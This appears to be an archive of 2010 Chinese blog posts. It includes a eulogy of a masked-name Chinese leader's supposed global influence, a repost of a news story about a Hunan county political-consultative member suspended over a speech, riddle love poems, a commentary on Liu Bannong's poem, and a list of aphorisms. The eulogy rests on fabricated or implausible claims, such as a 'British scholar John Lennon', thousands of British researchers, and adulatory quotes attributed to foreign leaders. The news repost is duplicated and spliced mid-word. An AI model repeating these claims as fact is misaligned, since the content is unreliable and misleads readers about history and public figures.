我是芸芸众生中的一员,是自然万物中一棵小草。我顽强而坚毅地活着,纵使风吹雨打、烈日爆晒,纵使斗转星移、四季轮回。也许基因注定我只是棵草,不可能成为参天大树,也许出生时注定我只能生活在贫瘠的石缝,不可能汲取丰富的养份,但我还是我——坚韧的意志,不屈的性格,与邻为善的本性,积极向上的品质。 一个人什么都可以老,就是思想不能老。——吴三桂悲惨结局之思考
( Sun, 9 May 2010 21:04:28 +0800 )
Description: 海外称“***是上帝的BOY 整个世界都为之痴狂!”
作者: ***逝世这么多年了,海外“***热”如今仍持续升温。研究***思想的西方学者愈来愈多。
英国著名的学者约翰·列农曾撰文感慨:“世界上深受中国领袖***影响的人,数以几十亿计。很多国家的人民,在某种意义上把***作为他们的精神图腾。”美国学者施拉姆直言不讳地说:“一百年之后,***仍是世界人民最为关注的思想家与军事家。”
一些西方学者大胆地摈弃意识形态之争,对***的世界历史贡献进行了非常深入的研究。他们给予***的评价甚至超越受益最大的中华民族的学者们所给予的赞誉。施拉姆对此做了进一步解释:“***的一生,是在为全人类的最终命运战斗和操心的一生。他不仅是公平正义的化身,也是不畏强权的斗士。他不仅处处维护中国劳苦大众的利益,也为世界人民的民族解放事业费尽心血。***个人出色的战略眼光,让那个时代其他政治领袖黯然失色。”
纵横四海,处处皆见***的思想。笔者就个人目力所及,把全球深受***思想影响的国家做一小结:
1.英国:研究***的英国著名学者多达3500人!
英国人之所以崇敬***,是因为***的辨证的思维能力让其信服。无论你问任何成年英国人:"中国的四大发明有哪些?孔子对中国产生哪些影响?"英国人可能说不出几个。但如果谈起***,他们居然能背诵出***多条经典语录!***通俗而古典的理论修养和强势逼人的领袖气魄,吸引了一代又一代的英国年轻人。
***的"丢掉幻想,准备斗争(Cast away illusio , Prepare for Revolution.)"的精美语言,更被许多英国人作为座右铭牢记在心,并激励自己勇往直前,自强不息。曾几何时,***这个名字,成为师生之间讨论最多的国外话题。有人统计,研究***的英国资深学者多达3500人!而英国海德公园至今仍随处可见印在墙上的***画像……
2.日本:翻译出版有关***著作最多的国家
七十年代,日本***创办了不少宣传***思想的进步报刊,呼吁广大日本人民要深深体会到"只有***思想,才能救日本。"在***思想指引下,日本人民反美爱国斗争深入发展。群众高举***画像、高喊"星星之火,可以燎原"的口号向日本官僚主义展开进攻……
二十一世纪初叶,随着国际形势深刻变化,研究***的著作骤然增加,翻译出版***著作多达上万个不同的版本。日本宣称,"全世界出版***著作最多的国家在日本!"
日本人研究***思想最深入的课题是:"如何消除贫富两极分化?怎样彻底实现共同富裕?"
3.委内瑞拉:用***思想去实现伟大的社会主义
查韦斯向国内人民演讲时,强调最多的一句话是:"凡是敌人反对的我们就要拥护,凡是敌人拥护的我们就要反对!"这句***最有哲理的一句话,引导着委内瑞拉主流民意不畏美国强权政治,自信自强地开展国内政治、经济建设。
委内瑞拉人民之所以对中国人民怀着十分友好的感情,是因为中国政府和人民始终奉行"不干涉他国内政"的原则,并强调国与国之间平等往来,而这一精神的精要是***外交智慧的集中体现。
***思想在委内瑞拉深入人心。他们觉得***的思想是非常革命的思想。"贯彻中国***思想可以帮助消除我所处的社会的不公。尤其是在我看来,***在中国倡导的社会主义道路与前苏联的官僚的、僵化的、狭隘的‘社会主义’不同,看起来更加生机勃勃、不教条和具有革命性。"总统查韦斯向他的拥护者忘情地说。
查韦斯的口号:"用***思想武装自己,力争早日实现伟大的社会主义!"
4.尼泊尔:"***主义"指导与领导着尼泊尔人民建设自己的家园
尼泊尔***奉行密缜的"***主义",他们"自信人生二百年,会当击水三千里"。经过数十年卧薪尝胆,最终靠自己的力量赢得了尼泊尔民意,终结了国家君主制,建立了联邦民主共和国,这对尼泊尔具有重大的历史意义。
尼泊尔首任总理普拉昌达是个典型的***崇拜者与***思想追随者,他本人坦承:"没有***主义指导我们,便没有尼泊尔联邦民主共和国的今天。"
普拉昌达最爱引用的***一句话是:"雄关漫道真如铁,而今迈步从头越!"
5.朝鲜:一个对***心存感激之情的国家
当年,***的逝世,朝鲜领导人金日成泪水长流,哽咽说道:"他对中朝历史的影响将永世长存。"金日成一生只为两位外国领导人流泪痛哭过,而此两位重量级政治人物皆来自中国:一个是***,另一位是周恩来。
***他老人家最豪迈和傲气的一句话是:"一切反动派都是纸老虎!" 这句话,在金日成父子那里被发挥到极致。朝鲜人民在街道上悬挂的横幅"军民团结如一人,试看天下谁能敌"正是***个人原创语录。
结果朝鲜对外立场强硬,不顾美韩日极力反对,决然于近日发射导弹并高调撤出六方会谈机制。
《***选集》一直是朝鲜人民最喜欢争相传阅的经典读本。
6.泰国:"下定决心,不怕牺牲,排除万难,去争取胜利! "
历史上,泰国***曾高举***思想伟大红旗,坚持走农村包围城市、武装夺取政权的道路。泰共严密遵循***的建军路线,把泰国人民武装力量建设成为一支战无不胜的人民军队。1967年12月,泰共中央发表建党25周年文告,题为《更高地举起***思想伟大红旗,坚决把武装斗争进行到底》。
如今泰国***运动虽然陷入低潮,但***"下定决心,不怕牺牲,排除万难,去争取胜利"的豪迈语录,却鼓舞了泰国人民此起彼伏地展开党派斗争和武装政变。尽管泰国乱象丛生,不过人民渴望公平与正义的政治诉求还是值得肯定。
7.缅甸:***的影响无处不在
历史上,缅共中央曾顶住了苏修压力,克服了党内"左"、右倾机会主义,按***思想制定了"赢得战争,夺取政权"的革命路线。1967年缅共中央政治局通过决议,庄严宣布"***同志是世界无产阶级的领袖"。
后来虽然缅甸共产运动转入低谷,但缅甸历届政府均赞许 "***思想是缅甸一切政府工作的指导思想"。
在缅甸,***的影响无处不在。以"***"命名的街道随处可见。
如今的缅甸军政府推行亲华路线,并竭力反对美国霸权主义。 `
8.巴基斯坦:几乎全民崇拜***
***逝世那年,巴基斯坦领导人发来的唁感人肺腑。当时,巴国总理痛哭失声:
"像***那样的人物,在一个世纪,也许一千年里只能产生一位。毫无疑问,***是巨人中的巨人。他使历史显得渺小。他的强有力的影响在全世界亿万男女的心中留下了印记。***是革命的儿子,是革命的精髓,确实是革命的旋律和传奇,是震动世界的出色的新秩序的最高缔造者。***没有死,他永垂不朽。如果仅仅是从中国的范围来衡量他的划时代的功绩,那将有损于对这位非凡人物的纪念。他对当代局势发展的贡献是没有人可以比拟的。这位人物的谦虚和幽默,他的光荣和伟大,他的英勇和胜利,将永垂青史。***的名字将永远是穷人和被压迫者的伟大而正义的事业的同义语,是人类反对压迫和剥削的斗争的光辉象征,是对殖民主义和帝国主义的胜利的标志——我们巴基斯坦将永远怀着敬意纪念不朽的***。"
多年来,***在巴国深受尊崇,无不令人感动。巴基斯坦几乎全民崇敬***。他们不容忍国内出现任何亵渎中国领袖尊严之言行。
巴基斯坦学者在研究***课题上,态度一丝不苟,成绩显著进步。一系列宣传***的刊物,相继出现,乃至普通百姓都能背诵几段"毛
9.美国:国内总是出现一潮接一潮的"***热"
***第一次出现在西方视野是一本叫《生活》的画报,这本画报是那个年代美国文化的标志之一。由此,***和他的金光闪闪的红五星图像开始在纽约、华盛顿进而在整个美国本土璀璨夺目。美国相当多的总统对***充满敬仰,甚至以一睹***尊容为荣焉。
当其他一些亚非拉国家都出现一波接一波的"***热"时,华盛顿也"不甘示弱",研究***的著作陆续涌现,翻译***的作品更是版本繁多。
10..以色列:"人若犯我,我必犯人"
以色列朝野均推崇***强硬的军事斗争艺术。以色列新总理内塔尼亚胡曾这样评价***:"他使一个一直被西方人耻笑为东亚病夫式的中国,一举变成了一个强大凝聚力的现代民族国家,使几亿受尽压迫的中国人成了能够自己掌握自己命运的主人,这对我们民族的鼓舞都是震撼性的。"
以色列现任总统佩雷斯坦言:"我国的军事理论研究,大多参考了***相关著述。"前不久的加沙行动,以色列驻华大使安泰毅大使用中文解释:"人不犯我,我不犯人,人若犯我,我必犯人。"他说,"8年来,以色列没能执行这个很实际的建议,我们试尽了各种方法,但我们已经别无选择,我们要按照***主席的指点来做。"
当哈马斯哈马斯"以小博大",不断制造自杀性爆炸事件,不时绑架或暗杀以色列居民,用恐怖活动对抗,黎巴嫩、叙利亚、伊朗、甚至俄罗斯可能被卷进来,以色列军人却依然采取地面攻势,无所畏惧。
“泽东语录"。
11.巴勒斯坦:哈马斯借鉴***的"十六字"方针,与以色列展开游击战术。
哈马斯对以色列平民进行人弹恐怖袭击,我们极力反对。但哈马斯为巴勒斯坦人民独立解放斗争还是值得同情与肯定。
悲壮的哈马斯面对与对手力量悬殊情况下,苦心研究***"十六字"游击战术。即:"敌进我退,敌驻我扰,敌疲我打,敌退我追",这是***在作战实践中形成和提出的。哈马斯居然也深谙此要,但缺乏***军事思想之战略部署。
12. 伊朗:借鉴***的战术思想与美国弹性周旋
***最潇洒的一句话:"不管风吹浪打,胜似闲庭信步。" 伊朗当局与对美国的外交战,凭的便是此种心态。
为了刺激美国,伊朗总统内贾德甚至扬言:"把以色列从地球上抹去"。据说,内贾德对***非常崇拜,这样表态一方面拉拢阿拉伯世界,一方面挑动美以同盟的神经。吹吹打打,让美国陷入苦恼的外交境地。
此外,澳大利亚、新西兰、法国、德国、罗马利亚等都是"***热"比较集中的西方国家,非洲国家也争相研究***及其著作。
有鉴于海外"***热"持续升温(且居高不下),笔者认为,***最伟大也最闪光的地方,是他的思想深化到了政治哲学和历史哲学以及整个人类命运关照的层面,而他的战略战术则达到无数政治家无法攀及的高度。
"***热"在超出国界、超脱意识后,仍能在全球光芒四射,笔者认为,这归功于***本人代表广大劳苦大众的利益,他在维护公平正义方面,居功至伟。其人性的光辉,使其人格魅力镌刻永恒。
"暮色苍茫看劲松,乱云飞渡仍从容",自信且不朽的***,无愧是伟人中的伟人。
( Wed, 21 Apr 2010 09:24:26 +0800 )
Description:
一个值得沉思的问题 ——探讨一 从政协委员角度考虑: 从政协委员角度来看,胡佐军的发言毫无疑问是没有问题的,正如文中政协所说的“是一篇好的发言”。的确,笔者虽不清楚该县的实际情况,但从发言内容那三个颇有气势的标题可以看出,这个发言至少是经过充分准备的,是下了功夫的,是作为政协委员在充分调查研究后提出的非常负责的议案。这么好的一个发言,为什么会受到处分呢?退一万步说,即使这个发言和党的政策有背,和现行法规相违,但作为一个政协委员的“一家之言”,也不应该受到任何处分。法律明文规定,在人大政协正式会议上,代表委员的发言不负法律责任,这正是为了充分调动人大代表和政协委员参政议政的积极性,发挥人大代表的主人翁作用和政协委员的监督作用。 综上所述,对胡进行处分不妥。
( Wed, 21 Apr 2010 09:03:12 +0800 )
Description:
一个值得沉思的问题
——问题究竟出在哪儿??? 4月20日,腾讯网登出《湖南双牌县政协委员发言惹怒书记被停职检讨》的文章,读后陷入沉思。问题究竟出在哪儿??愿各位网友各抒已见。现将原文转录如下: 湖南双牌县政协委员发言惹怒书记被停职检讨
2010年04月20日05:04
字号:
湖南消息 大会发言是政协委员依据政协章程履行职责、行使民主权利的主要方式之一,通过大会发言对国家和地方的重大事务进行协商,对国家机关和国家工作人员的工作提出建议和批评。但湖南省双牌县政协委员、县委办副主任胡佐军的大会发言却使县委书记郑柏顺不高兴,“书记很生气,后果真严重。” ——胡佐军因此被责令检讨并停职。
县委书记的当场批示
3月11日上午,双牌县政协七届三次会议开幕大会在县花鼓剧院举行。
按照议程,当天的开幕会上,共安排了5位委员发言。来自工会青年界的县政协委员、县委办副主任胡佐军被安排在第三个发言。
胡佐军委员发言的题目是《凸显双牌比较优势,打开工业招商新局》。
胡佐军在发言时开宗明义说:“我县虽是一个区位、人口都不占优势的山区林区县,工业招商困难很多,但潜力巨大,特别是随着近几年交通、城市、园区建设的大步迈进,各种瓶颈制约正在打破,各种政策体系日趋完善,已经具备了大招商、招大商的坚实基础和良好条件,只要我们立足县情实际,加快打造、放大、培育自身比较优势,人口小县也能招大商,传统林区县也能变成新兴工业县,双牌也能迎来工业发展的春天。”
胡佐军委员提出建议:“大干快上重大项目,打造工业招商的三大平台优势;强力开展整合利用,放大工业招商的三大资源优势;努力创新工作方式,凸显工业招商的三大效能优势。”
“一开始觉得没什么,慢慢发现他(县委书记)的脸色不对劲。”一位与县委书记郑柏顺同坐主席台的县领导回忆,“郑书记一言不发,在材料上写着什么。”
胡佐军委员结束发言时还说:“以上发言,仅一家之言,请大家批评指正。”
“这时候,书记更加不高兴了,他对周边的人说‘你代表的是哪一家’。”上述县领导忆及当时的情形。
接近12点时,大会主持人宣布散会。但县政协主席、县人大常委会主任等,被要求留下来。
“郑书记显然很生气,说胡的发言严重违反政治纪律,个人主义膨胀,还当场批评县政协主席和县委办主任,怎么不对发言材料把好关,并要求把发言材料收回。”一位县领导说。
这时,大家看到了郑柏顺在胡佐军委员发言材料上作的批示:“涉及的内容不应作个人发言,这些是县委已经安排部署的改革措施。作为县委办工作人员必要(应为“需”,原文如此)要自重、自省,切莫犯政治原则性错误。”
大会发言材料被收回
谁也没有料到会出现这样的局面。在此之前,县政协确定大会发言材料时,普遍认为这是一份非常好的发言材料。
“这么重要的会议,我们在确定发言主旨和人员方面,都作了充分考虑。”一位县政协副主席在接受记者采访时说,“今年是县委提出的项目招商年,我们觉得政协在这方面应该多建言献策,当时就提出由一名委员来作一个招商引资的发言。考虑到胡佐军既是政协委员,又是县委办负责材料的副主任,所以在县政协常委会议上,大家一致推荐了他。”
“看了郑书记对发言材料的批示后,县政协领导们立马碰头,想为委员承担一定的责任。”一位县政协副主席说,“既然是县政协常务委员会推选的发言人,我们就得保护每一位委员发言的权利。”
大家商议的结果是,收回胡佐军委员的发言材料。3月12日,大会秘书处发出“关于对胡佐军委员大会发言的说明”简报,称:胡佐军委员的发言“其内容是县委正在实施、确定实施和准备实施的决策部署,这些内容不应作为个人发言,大会秘书处对此材料审核把关不严,因此,作收回处理”。
迅速而严厉的处理
3月12日中午,在县人大会开幕后,县委书记郑柏顺召集了县长、县委副书记、组织部部长、县纪委书记、县委办主任等开了一个小会。
据知情者透露,郑柏顺在会上讲了几点意见,大意如下:一、胡佐军有政治野心,目无组织纪律,个人英雄主义膨胀;二、停止县委办副主任职务,交出办公室钥匙;三、要胡佐军下农村带队搞两个月,回后另行安排,调一般科局任副职;四、向县委写出深刻检讨。
一个值得沉思的问题
——问题究竟出在哪儿??? 4月20日,腾讯网登出《湖南双牌县政协委员发言惹怒书记被停职检讨》的文章,读后陷入沉思。问题究竟出在哪儿??愿各位网友各抒已见。现将原文转录如下: 湖南双牌县政协委员发言惹怒书记被停职检讨
2010年04月20日05:04
字号:T|T
湖南消息 大会发言是政协委员依据政协章程履行职责、行使民主权利的主要方式之一,通过大会发言对国家和地方的重大事务进行协商,对国家机关和国家工作人员的工作提出建议和批评。但湖南省双牌县政协委员、县委办副主任胡佐军的大会发言却使县委书记郑柏顺不高兴,“书记很生气,后果真严重。” ——胡佐军因此被责令检讨并停职。
县委书记的当场批示
3月11日上午,双牌县政协七届三次会议开幕大会在县花鼓剧院举行。
按照议程,当天的开幕会上,共安排了5位委员发言。来自工会青年界的县政协委员、县委办副主任胡佐军被安排在第三个发言。
胡佐军委员发言的题目是《凸显双牌比较优势,打开工业招商新局》。
胡佐军在发言时开宗明义说:“我县虽是一个区位、人口都不占优势的山区林区县,工业招商困难很多,但潜力巨大,特别是随着近几年交通、城市、园区建设的大步迈进,各种瓶颈制约正在打破,各种政策体系日趋完善,已经具备了大招商、招大商的坚实基础和良好条件,只要我们立足县情实际,加快打造、放大、培育自身比较优势,人口小县也能招大商,传统林区县也能变成新兴工业县,双牌也能迎来工业发展的春天。”
胡佐军委员提出建议:“大干快上重大项目,打造工业招商的三大平台优势;强力开展整合利用,放大工业招商的三大资源优势;努力创新工作方式,凸显工业招商的三大效能优势。”
“一开始觉得没什么,慢慢发现他(县委书记)的脸色不对劲。”一位与县委书记郑柏顺同坐主席台的县领导回忆,“郑书记一言不发,在材料上写着什么。”
胡佐军委员结束发言时还说:“以上发言,仅一家之言,请大家批评指正。”
“这时候,书记更加不高兴了,他对周边的人说‘你代表的是哪一家’。”上述县领导忆及当时的情形。
接近12点时,大会主持人宣布散会。但县政协主席、县人大常委会主任等,被要求留下来。
“郑书记显然很生气,说胡的发言严重违反政治纪律,个人主义膨胀,还当场批评县政协主席和县委办主任,怎么不对发言材料把好关,并要求把发言材料收回。”一位县领导说。
这时,大家看到了郑柏顺在胡佐军委员发言材料上作的批示:“涉及的内容不应作个人发言,这些是县委已经安排部署的改革措施。作为县委办工作人员必要(应为“需”,原文如此)要自重、自省,切莫犯政治原则性错误。”
大会发言材料被收回
谁也没有料到会出现这样的局面。在此之前,县政协确定大会发言材料时,普遍认为这是一份非常好的发言材料。
“这么重要的会议,我们在确定发言主旨和人员方面,都作了充分考虑。”一位县政协副主席在接受记者采访时说,“今年是县委提出的项目招商年,我们觉得政协在这方面应该多建言献策,当时就提出由一名委员来作一个招商引资的发言。考虑到胡佐军既是政协委员,又是县委办负责材料的副主任,所以在县政协常委会议上,大家一致推荐了他。”
“看了郑书记对发言材料的批示后,县政协领导们立马碰头,想为委员承担一定的责任。”一位县政协副主席说,“既然是县政协常务委员会推选的发言人,我们就得保护每一位委员发言的权利。”
大家商议的结果是,收回胡佐军委员的发言材料。3月12日,大会秘书处发出“关于对胡佐军委员大会发言的说明”简报,称:胡佐军委员的发言“其内容是县委正在实施、确定实施和准备实施的决策部署,这些内容不应作为个人发言,大会秘书处对此材料审核把关不严,因此,作收回处理”。
迅速而严厉的处理
3月12日中午,在县人大会开幕后,县委书记郑柏顺召集了县长、县委副书记、组织部部长、县纪委书记、县委办主任等开了一个小会。
据知情者透露,郑柏顺在会上讲了几点意见,大意如下:一、胡佐军有政治野心,目无组织纪律,个人英雄主义膨胀;二、停止县委办副主任职务,交出办公室钥匙;三、要胡佐军下农村带队搞两个月,回后另行安排,调一般科局任副职;四、向县委写出深刻检讨。
县政协全会第二天,胡佐军委员就没有再参加会议了。胡佐军随后还写了一份3页纸的检讨。十多天后,这份检讨书被打印出来,送达每一位县委常委阅知。
“要求每个常委在上面签字,我也在上面签了字。”一位县委常委告诉记者,他依稀记得检讨书里的一句话“我愿意接受组织的任何处理”。
“谁还敢讲真话啊”
在胡佐军的一位同事印象中,胡是没有心机的人,不善察颜观色。他分析,胡佐军“发言时调子可能高了点,有点像书记讲话的口气,这样的发言就有抢风头的嫌疑了,所以会引起领导不悦”。
胡佐军委员的遭遇,在双牌引起广泛关注。
“凭心而论,胡佐军的发言很有水平,指出了招商引资存在的问题,也提出了中肯的建议。”一位委员认为这样处理不但过重,而且不可思议,“既没有涉及国家机密,又没有反党反社会,怎么就招致停职?”
“发言都会遭受处分,以后谁还敢讲真话啊!”另一位委员说。
协全会第二天,胡佐军委员就没有再参加会议了。胡佐军随后还写了一份3页纸的检讨。十多天后,这份检讨书被打印出来,送达每一位县委常委阅知。
“要求每个常委在上面签字,我也在上面签了字。”一位县委常委告诉记者,他依稀记得检讨书里的一句话“我愿意接受组织的任何处理”。
“谁还敢讲真话啊”
在胡佐军的一位同事印象中,胡是没有心机的人,不善察颜观色。他分析,胡佐军“发言时调子可能高了点,有点像书记讲话的口气,这样的发言就有抢风头的嫌疑了,所以会引起领导不悦”。
胡佐军委员的遭遇,在双牌引起广泛关注。
“凭心而论,胡佐军的发言很有水平,指出了招商引资存在的问题,也提出了中肯的建议。”一位委员认为这样处理不但过重,而且不可思议,“既没有涉及国家机密,又没有反党反社会,怎么就招致停职?”
“发言都会遭受处分,以后谁还敢讲真话啊!”另一位委员说。
( Wed, 14 Apr 2010 08:38:13 +0800 )
Description: 树撑天枝难觅,怀抱可怜却无心,赵国有妃不是女,鹅血满天鸟难得,远去不想囊羞涩,受尽苦难又换友,无奈心中只有你。(对不起我不爱你)
青山寺上一丛竹,天鹅还在鸟已去。前尘往事以成空,白云心中多条虹。心中有情藏不住,站在叽丛斗健3贫先撕陀兴?(等我亲自说爱你)
天鹅湖边鸟飞绝,白天相约解相思,唯忘只得我关心,双点齐把国玉移,无奈如何人归去,宝玉不见于谷外,双思只在内心旁,单身贵族尔相连。(我的心只可容纳你)
飞蛾扑火虫已逝,学友无子留撇须,偶尔留得一人在,三言并没有两语,牛仔过河搭木筏,仕别三日在这里,原来这字在界前。(我爱你一生一世)
接受又离只作友,情人无心土月勾,竹已孤竹单思苦,从也单从独自愁,如需闭口一了伴,谁人无言又同游。(爱一个人好难)
寒山寺上一棵竹,不能做称有人用,此言非虚能兑现,只要有情雨下显,天鹅一出鸟不见。(等你说爱我)
淮海又见水退时,双人换走阻碍石,月顶右手不见口,青年男女树心旁,世上何物最懂爱。(难得有情人)
孝子要习文,鹅边鸟飞去,饶人必无心,河干人独立,还来还要走,相思只一心,好女愿他旁。(叫我如何不想她)
木目跨于心,古人做反文,小和尚光头,凄惨无泪水。(想做你妻)
鸟飞鹅跳,月上中梢,目上朱砂,已异非巳,勺旁傍白,万事开头,工戈不全,雨下挚友,称断人和。(我用自己的方式爱你)
悔意无心空对,大哥头上有条,接受不离只作,单身贵族尔相,朝夕相对盼夕,情人别离影孤单,二人想逢在此处。(每天爱你多一些)
友情雨下永相拌,人情相遇有艾时,大雁南飞非人字,方知缘了应无点,除夕过后是何天?(爱你一万年) ( Fri, 9 Apr 2010 12:46:46 +0800 )
Description: 全文: 教我如何不想她
,一九二零年八月六日,伦敦 天上飘著些微云, 地上吹著些微风。
啊!
微风吹动了我头发,
教我如何不想她?
月光恋爱著海洋,
海洋恋爱著月光。
啊!
这般蜜也似的银夜,
教我如何不想她?
水面落花慢慢流。
水底鱼儿慢慢游。
啊!
燕子你说些什麼话?
教我如何不想她?
枯树在冷风里摇,
野火在暮色中烧。
啊!
西天还有些儿残霞,
教我如何不想她? 赏析:
《教我如何不想她》是刘半农1920年在伦敦时写的一首白话诗,1926年
将此诗谱曲。是30年代中国青年知识分子中,广泛流行的一首中国艺术歌曲。
这两位词、曲作者有很多共同点,他们都是江苏人,都是语言学家,而且两人都在语音学方面有特殊贡献。
刘半农是语言学家、诗人、小说家、翻译家,而且还是五四新文化运动的先锋人物。他在语音学方面的成就,主要是对汉语四声的实验。在文字学方面,他的突出贡献,就是创造了汉字中作为女性的第三人称代词的“她”字。
他是中国白话诗的带头人,我读过他的诗集《扬鞭集》(《教我如何不想她》收集在这本诗集里),其中一些诗篇,内容非常通俗、平民化,很多句子用普通老百姓的日常口语,甚至还有用家乡
的方言撰写的诗篇、记录的民谣。
关于刘半农的《教我如何不想她》这首诗还有一则有趣的传说。赵元任夫人杨步伟在她的回忆录《杂记赵家》中有一段叙述。1930年前后,杨步伟在北京女子文理学院任教,她的那些女学生们非常爱唱《教我如何不想她》,后来歌词作者刘半农奉命接掌该学院,刘半农穿了一件中式的蓝布棉袍子来到学校,女学生们偷偷议论:“原先听说刘半农是一个很风雅的文人,怎么会是一个土老头。”杨步伟听到了,就告诉这些女学生:“你们一天到晚都在唱他写的《教我如何不想她》,这就是那个他呀。”女学生哄了起来说:“这个人不像么。”还有的说:“这首歌不是你家赵先生写的吗?”杨步伟说:“曲是赵先生所谱,但歌词是他写的呀。”
后来刘半农知道了这件事,为此而打油四句:
教我如何不想他,请来共饮一杯茶。原来如此一老叟,教我如何再想他。
《教我如何不想她》的作曲者赵元任,是上世纪中国最有威望的语言学家。我年轻时曾经在高校从事过语言学工作,传说赵元任的听辨能力特别好,他外出考察方言,每到一个新地方,只要用三天的时间,就可以将当地方言的语音规律整理清楚。
作曲、唱歌是赵元任的业余爱好,他的业余音乐水平高于当时一般的专业音乐家。尤其是合唱曲的写作,他的水平高于一般。他的合唱曲《海韵》(徐志摩词)即使以现代标准来衡量,仍然是一首合唱精品。他的独唱曲也不同一般,就拿《教我如何不想她》来说吧,旋律优美、丰满,非但精确传递了歌词的精神,而且可以说提升了歌词意境。赵元任在这首歌里,以十分娴熟的技巧安排了转调,在那个年代的中国作品中,是很少见到的。这首歌曲用的是西洋作曲方法,但是旋律完全是中国味,而且不是一般地移植或改编民歌曲调,虽然赵元任自己在《歌注》中说:“有点像京剧西皮原板过门的末几字。”但是我觉得完全是一种新曲调。
关于《教我如何不想她》,我还想说四个问题:
一、《教我如何不想她》的最后一个字,究竟是男的“他”,还是女的“她”?在北京人民音乐出版社1981年编辑的《赵元任歌曲选集》中用的是男他,可是在刘小蕙著作的《父亲刘半农》一书中,是用的女“她”。
上世纪20年代,白话文兴起、翻译文学涌现,汉字第三人称不分男女造成很多不便,此时刘半农提议造新字“她”。周作人先生在当时的《新青年》杂志(1918年8月)上透露了这个消息,引起了很大的正面和负面的反响。刘半农就撰文《她字问题》发表在上海时事新闻(1920年8月9日)。时隔不到一个月,刘半农创作了《教我如何不想她》。刘小蕙在《父亲刘半农》一书中有这样一句话:1920年9月4日,在伦敦作《教我如何不想她》,首次将“她”字引入诗句。综合各方面的数据,原作应该是女的“她”。
二、题目的“叫我”和“教我”不统一,我查了各种版本,似乎两个都用,即使在刘小蕙的《父亲刘半农》一书中,也有时用“叫我”,有时用“教我”,看来可以作为同义词通用。
三、在这首歌里出现了倒词,举例“叫我”两字,在演唱中听来就好似“脚窝”,香港的王沾先生曾经提及此点,歌曲翻译家薛范也曾对我说过此事。笔着认为:这是因为30年代是中国现代艺术歌曲的初创时期,作曲家们还没有重视汉语歌词的四声和音乐进行的关系,他们更重视音乐从整体上表达歌词的意境,在这一方面,《教我如何不想他》可以称得上是成功的范例。由于歌词和音乐的优美,80年来,并没有因为倒词而影响了这首歌曲的经典地位。
四、国内曾有人探讨《教我如何不想她》的“她”究竟是谁?赵元任先生1981年回到中国时,有人请教了赵先生,赵先生回答说:这是想念祖国。
我个人从年轻时直到如今,都是把这首歌作为情歌来领会的,而且《教我如何不想她》初次发表的原名就是《情歌》,当然祖国之情也是情,但是从这首诗的用词造句来看,更接近男女爱情之“情”。
作为一首抒情诗篇,不必硬性地界定每个细节的具体意义,应该让读者自己去理解、想象、意会诗歌的内涵。《教我如何不想她》的祖国之情、男女爱恋之情、是她、是他,这些都可以让演唱者、听歌者自己去理解。
( Wed, 7 Apr 2010 10:09:48 +0800 )
Description: 1,绅士无非就是耐心的狼。老鼠嘲笑猫的时候,身旁必有一个洞。
2,站在山顶和站在山脚下的两人,虽然地位不同,但在对方眼里,同样的渺小。
3,结论就是你懒得再想下去的地方。――路的尽头,仍然是路,只要你愿意走。
4,使我们不快乐的,都是一些芝麻小事,我们可以躲闪一头大象,却躲不开一只苍蝇。
5,最好的与最坏的创造了历史,平庸之辈则繁衍了种族。
6,在这世上惟一件事比别人议论更糟,那就是无人议论你。
7,成功便是站起比倒下多一次。
8,失败并不意味你浪费了时间和生命。失败表明你有理由重新开始。
9,人生中有时不去冒险比冒险更危险。
10,所有的人都站在一边并不一定是好事,譬如他们都站在船的一边
11,许多人爬到了梯子的顶端,却发现梯子架错了墙。
12,偶然的成功比失败更可怕。
13,才华其实就是把与人相同的聪明用到与众不同的地方。
14,状态是干出来的,而不是等出来的。
15,道歉是为将来再次冒犯打下伏笔。
16,所谓百依百顺,就是为了某种不可告人的目的在未完成前,所表现的不同寻常的耐心。
17,所谓儿童不宜,其实就是大人们令人感动地把犯错误的危险留给了自己。
18,你想以40km/h的速度开车到80岁,还是以80km/h的速度开车到40岁?
19,在敌人面前,谁先镇定下来,谁就离胜利不远了。
20,所有的人都是平凡的,有些人因知道这一点而真正成了平凡的人。
21,乞丐就是一种向你的良心征税的人。
22,所谓大难不死,就是有了灾祸之后,得到的不是同情,而是莫名其妙的祝贺。
23,处在社交圈中是一种烦恼,而超脱出来简直是一场悲剧。
24,厌倦,就是一个人吃完盘子里的食物后对盘子的感情。
25,参加追悼会的程序常常是,先受一次深刻的人生教育,然后大家一起抽烟喝酒打牌。
26,知识是一种使求知者吃得越多越觉得饿的粮食。
27,爱情是会沉底的,在平淡的日子里,最重要的是经常轻轻晃一晃盛装爱情的“水杯”。 28,战争:用舌头解不开就用牙齿咬吧!
29,憎恨别人就像为了逮住一只耗子而不惜烧毁你自己的房子。但耗子不一定逮到了
30,每个人的一生都有许多梦想,但如果其中一个不断搅扰着你,剩下的就仅仅是行动了。
31,世上只有想不通的人,没有走不通的路。
32,幸运之神的降临,往往只是因为你多看了一眼,多想了一下,多走了一步。
33,失败发生在彻底的放弃之后。
34,所谓敌人,不过是那些迫使我们自己变得强大的人。
35,胆怯的人在危险前被吓住了;懦弱的人在危险中被吓住了;勇敢的人在危险过后被吓住了。
36,使人疲惫的不是远方的高山,而是鞋里的一粒沙子。
37,家庭的幸福需夫妻共同努力,而破坏它,一人就够了。
38,最了解你的人有时不是你的朋友,而是你的敌人。
39,你若不想做,会找一个或无数个借口;你若想做,会想一个或无数个办法。
40,看一个人的心术,看他的眼神;看一个人的身价,看他的对手;看一个人的底牌,看他的朋友。
41,魅力女人,就是有充分的意志力去抵挡男人的进攻,也有足够多的魅力阻挡男人的撤退。 42,山盟海誓是一种经常让高山和海洋领受尴尬的重量级承诺。
43,好女人是一所学校,好男人毕业了可留校任教。
44,你不理财,财不理你。
45,不要同一个傻瓜争辩,否则别人会搞不清到底谁是傻瓜。
46,加班加点,废寝忘食有时很可能是不具备效率和工作能力的表现。
47,做父母是个专业性很强的职业,可大部分的父母未经任何培训就上岗了。
48,凡向鳄鱼池内投掷物品者,必须下池自己捡回。――肯尼亚天然动物园告示
49,当你想丢点什么的时候请想想,千万别丢脸。――成都垃圾箱,果皮箱上语
50,凡是上了年纪的人,大多是反对的太多,商议的太久,行动的太迟,后悔的太早。
51,做生意的过程就是一个不断怂恿别人放松警惕,而自己保持高度警惕的过程。
52,打工者做工,小老板做事,中老板做市,大老板做势――你是哪一种?
53,成功是一种观念,致富是一种义务,快乐是一种权力。
54,聪明人能洞察事物未来的发展趋势。他们在发洪水之前养鸭,而不是养鸡。
55,两种人无药可救:一是不服从命令的人,二是惟命是从的人。
56,打算开创新事业时,十人中有一两人赞成时就可开始,以免太迟。
57,买保险――用不上时痛苦,用上时更痛苦。
58,给猴一棵树,给虎一座山。――用人之道
